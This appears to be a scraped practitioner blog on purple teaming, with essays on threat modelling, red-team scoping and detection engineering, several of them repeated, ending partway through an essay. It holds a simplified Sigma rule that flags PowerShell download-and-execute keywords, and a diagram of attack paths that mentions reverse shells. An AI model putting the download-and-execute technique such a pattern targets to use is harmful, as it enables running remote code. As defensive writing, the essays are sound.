For senior practitioners

Purple teaming with professional standards

A practitioner-led publication on threat-model discipline, detection engineering, realistic red teaming, and the operational work required to make red and blue teams genuinely effective together.

Latest essay

Most recent

11 essays published. One per week, Thursdays.

OT SecurityPurple TeamingICSCritical Infrastructure23 April 2026 · 6 min read

Purple Teaming OT: Why 'We Can't Test That' Is No Longer Acceptable

I keep hearing the same thing in conversations about operational technology security. That view made sense in 2015. It does not make sense now. The threat actors attacking energy, utilities, and critical infrastructure are not holding back out of concern for operational continuit…

Read essay
Red TeamPurple TeamingThreat Modelling16 April 2026 · 6 min read

How to Scope a Red Team Engagement That Tells You Something Real

Most red team engagements produce an impressive document and a set of "critical findings" that the security team could have predicted before the first phishing email was sent. The problem is usually not the red team. It's the scope conversation. Nobody has it properly.…

Read essay
Purple Teaming10 April 2026 · 6 min read

Purple Teaming That Actually Works: A Framework for Real Collaboration

You've got a red team and a blue team. They hate each other. Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly …

Read essay
Purple Teaming3 April 2026 · 6 min read

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration. Blue team reviews the engagement. They have a list of "findings." Detection …

Read essay
Purple Teaming20 March 2026 · 5 min read

Your Purple Team Test Failed Because Your Threat Model Is Wrong

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect. Then you got the debrief: your EDR caught nothing. Your SIEM w…

Read essay
Purple TeamingRed TeamBlue Team10 April 2026 · 6 min read

Purple Teaming That Actually Works: A Framework for Real Collaboration

You've got a red team and a blue team. They hate each other. Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly …

Read essay
Red TeamPurple Teaming3 April 2026 · 6 min read

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration. Blue team reviews the engagement. They have a list of "findings." Detection …

Read essay
Purple TeamingThreat Modelling20 March 2026 · 5 min read

Your Purple Team Test Failed Because Your Threat Model Is Wrong

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect. Then you got the debrief: your EDR caught nothing. Your SIEM w…

Read essay
About the author
HM

Hugh McGauran

Cybersecurity practitioner with 25 years of experience across enterprise security, red and blue collaboration, and detection engineering. Country Manager Ireland at Armis.

Focus areas: purple team methodology, detection engineering, adversary emulation, operational realism.
Audience: senior security practitioners, technical leaders, detection engineers, red team and blue team operators.
Style: direct, field-informed, and sceptical of generic security advice that ignores environment and context.
What this publication is for

An editorial site for serious practitioners

PurpleTeamAI exists because too much security content is polished nonsense. Vendor campaigns are presented as strategy. Generic frameworks are recycled as expertise. Mature teams need something better.

This publication is for people who already understand the basics and want a more honest discussion about what to test, what to tune, what to stop doing, and how to make collaborative security actually work.

← All essays
Purple TeamingThreat Modelling

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran 20 March 2026 5 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

  1. Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
  1. Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
  1. Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment:

  • Windows 10/11 workstations, hardened build
  • Modern domain controllers with Kerberos hardening
  • Network segmentation: finance backend on isolated VLAN, can't reach from general corp network
  • EDR deployed globally
  • No plaintext credentials stored on endpoints
  • Conditional Access enforces multi-factor authentication
  • Sensitive data is encrypted at rest

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Encrypted data stays encrypted. Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic. We need better encryption key logging."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

  • Use living-off-the-land techniques (no Mimikatz)
  • Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
  • Steal credentials from memory over time, not via flashy in-memory attacks
  • Exfil via HTTP/HTTPS, not SMB or DNS tunneling (you'd flag those)

So your EDR should miss those attacks, because they're not your risk. Your tools are configured for your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

  1. You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not—you're watching simulations that would never work in the real world.
  1. You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you. That time could go to hunting for actual threats or hardening critical systems.
  1. You create alert fatigue. All those detection rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't adequately monitor.
  1. You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the latest SIEM module, the newest EDR feature, the fancy threat hunting platform. None of which you needed if your testing was threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model.

Ask yourself:

  • Who targets companies like mine? (Organized crime, state-sponsored, activists, insiders?)
  • What are they after? (Financial data, IP, customer PII, operational disruption?)
  • What access do they typically start with? (Phishing, supply chain, credential stuffing, insider?)
  • What's their environment awareness? (Will they know about my network segmentation? My EDR?)

Write this down. Three paragraphs, maximum. "Our primary threat is FIN7. They target financial services via spear-phishing to get initial access to non-critical systems. They spend weeks moving laterally to reach our payment processing tier."

Step 2: Map your environment against that threat.

  • What attack paths does your threat model realistically have access to?
  • Where can they move? (Based on segmentation, not assumption.)
  • What techniques are actually possible? (Not "Mimikatz might work;" does it work here?)
  • What detection gaps exist on those paths?

Step 3: Test only the relevant paths.

Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing + living-off-the-land lateral movement, test that.

If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations.

If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.

The Honest Conversation

Here's what I'd tell your security team:

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure—that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us, and build detection for those attack paths."

This conversation is uncomfortable because it implies your purple team programme might be theater. But it's the one that matters.

What's Next

For your next purple team exercise:

  1. Spend time defining threat model, not technique selection
  2. Have blue team validate which attack paths are realistic in your environment
  3. Red team tests those paths, trying to evade detection on actual adversary techniques
  4. Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat.

That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.


Further Reading:

  • MITRE ATT&CK: A framework, not a testing roadmap
  • Threat modeling: Microsoft's threat modeling guide
  • Practical Purple Teaming (Alfie Champion): Methodology for real collaboration

Have a counter-argument? Reply in the Discord community—let's debate threat modelling.


Next week: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps we found in a financial services engagement.

← All essays
Detection EngineeringBlue Team

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran 27 March 2026 6 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

Let's look at a real example. This is a common Sigma rule (simplified):


title: Suspicious PowerShell Execution
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection

This rule fires when PowerShell runs with suspicious keywords. Seems solid. Catches code injection, right?

Now let's deploy it in a real environment:

  1. Your software deployment tool (SCCM, Ansible, whatever) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
  1. Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
  1. Your developers have scripts with "IEX" in comments. Execution fires on comment lines. Noise.
  1. Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. It alerts on things EDR already allowed.

By week two, detection engineers have disabled half the rule. By month one, it's gone. And when an attacker actually uses PowerShell injection, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume:

  • No legitimate tools use the same technique
  • All environments have the same baseline behaviour
  • Detection can be tuned to pure signal (no noise)
  • Attackers use the same techniques in every environment

All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks. But it'll also alert on 10,000 false positives. The choice is: tune aggressively (miss attacks) or accept noise (burn out analysts). There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.

The Real Problem With Sigma (and YARA, and Generic Rules)

Don't get me wrong—Sigma is excellent. Open-source, community-driven, better than nothing.

But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either:

  • Blindly tuned rules — so permissive they're useless
  • Overly aggressive rules — so noisy they're turned off within a week
  • Rules that don't apply — designed for environments completely different from yours

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline.

Run your legitimate tools and systems for a week. Capture:

  • Normal PowerShell execution patterns (what commands, how often, from which systems)
  • Normal network connections (which systems talk to which, ports, protocols)
  • Normal process relationships (which processes spawn which children)
  • Normal file writes (where legitimate software writes, when, how often)

Write this down. This is your signal floor. Anything below this is noise; anything above is suspicious.

Then build detection for your actual threats.

Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools. Insiders would access your sensitive data paths.

Build rules for those specific paths, in your specific environment, against your specific baseline.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts.

Anything else? Alert immediately. No false positives because you know your baseline.

Tune for precision, not coverage.

Don't try to detect every possible attack technique. Detect the ones that matter to you. Quality over quantity.

Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point—a hypothesis library.

Use them like this:

  1. Review — Which techniques are relevant to my threat model?
  2. Understand — What is this rule trying to catch? How does it work?
  3. Evaluate — Would this actually detect an attack in my environment, or would it be lost in noise?
  4. Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
  5. Test — Run it against historical data. Does it catch what you expect? How many false positives?
  6. Deploy — Only if it's precise enough to keep tuned for more than a month.

This takes time. It's not as fast as importing 800 rules. But it works.

The Uncomfortable Truth

If your detection programme consists of:

  • Rules from the internet
  • Sigma rules you didn't adapt
  • Detection thresholds you didn't tune
  • Coverage of every MITRE ATT&CK technique

...then you have a detection programme in name only. In practice, you're hoping someone else's rules work in your environment. They usually don't.

The uncomfortable part: Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands:

  • Your systems (what's normal)
  • Your threats (what's dangerous)
  • Your tools (what they can actually detect)

That person is on your team. Or you don't have effective detection.

What's Next

For your detection programme:

  1. Audit your rules. How many do you actually tune and maintain? Delete the rest.
  2. Establish your baseline. Document normal behaviour for critical systems and techniques.
  3. Build environment-specific rules for your threat model. Don't import; adapt.
  4. Focus on precision. Ten good rules beat 1000 mediocre rules.
  5. Invest in the people who know your environment. That's where effective detection lives.

Further Reading:

  • Detection Engineering and Threat Hunting (Marcus Hutchins): Real-world detection work
  • Security Data Science (Andrew Pendergast): Baselining and anomaly detection
  • Florian Roth's Sigma rules: Study how they work; understand why you'll need to adapt them

Question: How many detection rules do you maintain? How many are turned off? We should talk about that.


Next week: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.

Previous
← Your Purple Team Test Failed Because Your Threat Model Is Wrong
← All essays
Red TeamPurple Teaming

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Hugh McGauran 3 April 2026 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter.

Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement.

Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope:

  • Initial access (phishing, watering hole, supply chain)
  • Lateral movement (everything on the network)
  • Persistence (any means necessary)
  • Exfiltration (any data, any method)

This sounds comprehensive. It sounds realistic. It's actually a fantasy.

Reality: An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." They have:

  • Initial access: Maybe phishing works. Maybe it doesn't. They don't get to pivot to every possible next step.
  • Lateral movement: They can move within the compromised subnet and maybe one adjacent network. Hard segmentation blocks them beyond that.
  • Persistence: Certain accounts and systems work; others have additional logging and monitoring.
  • Exfiltration: They can exfil data, but they're constrained by network egress points and monitoring.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment—they're fighting an idealized version of it.

The Environment Problem

Here's where it gets messy.

Red team asks: "What systems can we access?"

Blue team (or the client) says: "Whatever an attacker could realistically access."

This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

The answer is usually much smaller. A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway.

Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

  • Kerberos relay attacks (requires certain network conditions that don't exist here)
  • Memory-only persistence (requires no EDR; EDR is deployed)
  • Named pipe lateral movement (works in the test, but in production the pipes are monitored)
  • PowerShell obfuscation (detected by their logging; they just didn't run it in the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

Blue team thinks detection failed. Really, detection is fine—the technique just wasn't realistic.

The Time Problem

Red team has unlimited time to find a path. An attacker has limited time before they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked/detected on the third, leaves (or adapts).

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds.

The persistence and thoroughness of a week-long engagement is not representative of the speed/detection requirements of a real intrusion.

But nobody talks about this in the debrief. Red team just marks it as "successful lateral movement."

What This Means

Your red team engagement tells you:

"Over an extended period, using known techniques, with no time pressure, against systems and networks we can freely access and test, we were able to move laterally and exfiltrate data."

What it doesn't tell you:

"Against your actual threat model, in real time, with your actual monitoring and detection in place, this is what would happen."

Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

  1. Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
  1. Time-limited and detection-aware. Red team doesn't have unlimited time to brute-force techniques. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
  1. Constrained to realistic access. Red team starts from actual initial access vector (phishing, supply chain, etc.) not from "we've already compromised a workstation." They work with the access they actually get.
  1. Detection evasion is the goal, not secondary. Red team doesn't just run commands; they try to run them in ways that avoid detection. If it's immediately flagged, it fails—doesn't matter if the technique "works."
  1. Realistic tool constraints. Red team uses tools an attacker would actually use, not just "what works in this test." If they'd use living-off-the-land, they do. If they'd avoid Mimikatz because EDR would catch it, they do.

The Uncomfortable Conversation

Here's what I'd tell a client:

"Your last red team engagement tested whether advanced techniques are possible in your environment, not whether they'd succeed in a real attack. The findings are less meaningful than you think. Let's reframe the next engagement around your actual threat model and realistic constraints."

This is hard because:

  • Red team has to work harder
  • Results are less "impressive" (maybe red team fails certain objectives)
  • It requires more collaboration between red and blue teams
  • It can't be outsourced to a generic red team vendor

But it's honest.

A Simple Test

Ask yourself:

  • Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
  • Would your actual threat actor have access to every system red team tested?
  • Did red team have to evade detection, or was it just running commands and seeing what worked?
  • Were there time or detection constraints that matched a real attack, or was it an extended, unmolested testing window?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.


Further Reading:

  • NIST SP 800-115 (Technical Security Testing): How to scope and run engagements properly
  • Adversary emulation vs. penetration testing: The difference matters
  • Detection-driven red teaming: A better framework

Reality check: When was your last red team engagement? What did it actually prove?


Next week: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.

Previous
← Detection Engineering in a Real Environment: Why Generic Rules Fail
← All essays
Purple TeamingRed TeamBlue Team

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran 10 April 2026 6 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved."

It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward. Red team did things blue team thinks are wrong. Blue team didn't detect things they think they should have.

Month 4: Nothing changes. Red team goes back to thinking about attacks. Blue team goes back to reactive defense.

Month 5: "Why aren't we purple teaming anymore?" Meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's:

Continuous, aligned, threat-model-driven collaboration between attack and defense.

That's different from:

  • Red teaming (I attack; you detect what I did)
  • Blue teaming (I defend; hope you don't break my things)
  • Penetration testing (Contract engagement with findings)
  • Security auditing (Compliance check)

Purple teaming means:

  • Red team understands blue team's detection capabilities and constraints
  • Blue team understands attack sequences and threat actor patterns
  • Both teams align on what matters (threat model)
  • Both teams iterate continuously to improve both attack and defense
  • Collaboration is built into operations, not scheduled quarterly

The Framework

Here's how to actually build it:

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality.

Questions to answer together:

  • Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
  • What do they want? (Data, disruption, espionage, financial gain)
  • How do they typically access our environment? (Phishing, supply chain, stolen creds, physical access)
  • What paths exist from initial access to objective? (Not "any path"—realistic paths given our segmentation and security controls)
  • How much time do they have? (Minutes? Hours? Days?)
  • What detection would burn them? (At what point does our environment go "we're under attack"?)

Document this. Literally write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2-4 hours. They exfil via HTTPS to infrastructure we can't block."

This is not a consultant document. This is the shared foundation.

2. Map Realistic Attack Paths (Week 2–3)

Now, given that threat model, what are the actual attack paths?

Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them:


Initial Access (phishing email)
    ↓
User clicks, code executes (PowerShell, Word macro, whatever)
    ↓
Reverse shell / beaconing established
    ↓
Lateral movement to: [SQL server? File server? DC? Not everywhere—only where they'd go]
    ↓
Objective: [Exfil financial data? Plant backdoor? Disrupt systems?]

Blue team adds detection points:


Initial Access → EDR monitors suspicious process execution
    ↓ (if they evade)
Reverse shell → Firewall monitors outbound HTTPS to unknown IPs
    ↓ (if they evade)
Lateral movement → Network monitoring for admin tool usage on [specific systems]
    ↓ (if they evade)
Objective → Data loss prevention monitors file access patterns

Now you have an attack sequence + detection sequence. This is what you test. Not everything. This.

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules:

  • Start from your actual initial access vector (phishing, not "assume we're already in")
  • Move only to systems your threat model would target
  • Use tools/techniques your threat model would use
  • Avoid detection, don't just run commands

When red team succeeds: "We successfully executed the threat model while avoiding detection."

When red team fails: "We were detected at the lateral movement phase."

Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack.

Weekly threat hunting sessions:

  • "Given our threat model, what would the initial access look like?"
  • "What can we detect in the first 30 minutes?"
  • "Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team playbooks, but scoped to your paths.

Update detection rules based on what red team teaches them about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync:

  • What did red team learn about evasion?
  • What did blue team learn about detection?
  • Did our threat model change? (New threat intel, new attacks in the wild?)
  • How did we do against a realistic attack? Faster than last month? More detection?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need:

Time allocation:

  • Red team: 20% of their week to collaborative exercises (not 100% red ops)
  • Blue team: 5–10% of SOC time to active hunting (not just passive monitoring)
  • Leadership: Time for monthly sync and iteration

Metrics (not vanity metrics):

  • Mean time to detect (for the threat model you care about)
  • Mean time to respond
  • Techniques red team is using that blue team isn't catching
  • Detection improvements month-over-month

Escalation path: If red team finds something critical (real vulnerability, not just "technique works"), what happens? (Shouldn't be stuck in a quarterly debrief.)

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist.

You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll run the motions and get the theatre. You won't get the results.

But if you do this right, you get something real:

  • Red team that understands why they're testing what they're testing
  • Blue team that detects threats faster
  • Security operations that improve month-over-month
  • Collaborative culture instead of siloed teams

Checklist: Do You Have a Real Purple Team Programme?

  • [ ] Shared, documented threat model (written, agreed by red + blue + leadership)
  • [ ] Realistic attack paths (not "test everything," but specific sequences)
  • [ ] Red team constrained to threat model (not unlimited scope)
  • [ ] Blue team actively hunting (not passively monitoring)
  • [ ] Monthly sync between teams (with iteration, not just reporting)
  • [ ] Detection improving month-over-month (measurable)
  • [ ] Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.


Further Reading:

  • Practical Purple Teaming (Alfie Champion): The operational playbook
  • VECTR: Framework for adversary emulation and red teaming
  • Active Defense: Threat modelling for defence

Question: Do you have a documented threat model that both red and blue teams agree on? Start there.


Next week: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.

Previous
← Why Your Red Team Tests Are Designed to Fail, And You Don't Know It
← All essays
Purple Teaming

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran 20 March 2026 5 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

  1. Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
  1. Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
  1. Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment:

  • Windows 10/11 workstations, hardened build
  • Modern domain controllers with Kerberos hardening
  • Network segmentation: finance backend on isolated VLAN, can't reach from general corp network
  • EDR deployed globally
  • No plaintext credentials stored on endpoints
  • Conditional Access enforces multi-factor authentication
  • Sensitive data is encrypted at rest

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Encrypted data stays encrypted. Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic. We need better encryption key logging."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

  • Use living-off-the-land techniques (no Mimikatz)
  • Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
  • Steal credentials from memory over time, not via flashy in-memory attacks
  • Exfil via HTTP/HTTPS, not SMB or DNS tunneling (you'd flag those)

So your EDR should miss those attacks, because they're not your risk. Your tools are configured for your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

  1. You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not—you're watching simulations that would never work in the real world.
  1. You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you. That time could go to hunting for actual threats or hardening critical systems.
  1. You create alert fatigue. All those detection rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't adequately monitor.
  1. You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the latest SIEM module, the newest EDR feature, the fancy threat hunting platform. None of which you needed if your testing was threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model.

Ask yourself:

  • Who targets companies like mine? (Organized crime, state-sponsored, activists, insiders?)
  • What are they after? (Financial data, IP, customer PII, operational disruption?)
  • What access do they typically start with? (Phishing, supply chain, credential stuffing, insider?)
  • What's their environment awareness? (Will they know about my network segmentation? My EDR?)

Write this down. Three paragraphs, maximum. "Our primary threat is FIN7. They target financial services via spear-phishing to get initial access to non-critical systems. They spend weeks moving laterally to reach our payment processing tier."

Step 2: Map your environment against that threat.

  • What attack paths does your threat model realistically have access to?
  • Where can they move? (Based on segmentation, not assumption.)
  • What techniques are actually possible? (Not "Mimikatz might work;" does it work here?)
  • What detection gaps exist on those paths?

Step 3: Test only the relevant paths.

Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing + living-off-the-land lateral movement, test that.

If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations.

If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.

The Honest Conversation

Here's what I'd tell your security team:

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure—that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us, and build detection for those attack paths."

This conversation is uncomfortable because it implies your purple team programme might be theater. But it's the one that matters.

What's Next

For your next purple team exercise:

  1. Spend time defining threat model, not technique selection
  2. Have blue team validate which attack paths are realistic in your environment
  3. Red team tests those paths, trying to evade detection on actual adversary techniques
  4. Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat.

That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.


Further Reading:

  • MITRE ATT&CK: A framework, not a testing roadmap
  • Threat modeling: Microsoft's threat modeling guide
  • Practical Purple Teaming (Alfie Champion): Methodology for real collaboration

Have a counter-argument? Reply in the Discord community—let's debate threat modelling.


Next week: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps we found in a financial services engagement.

← All essays
Purple Teaming

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran 27 March 2026 6 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

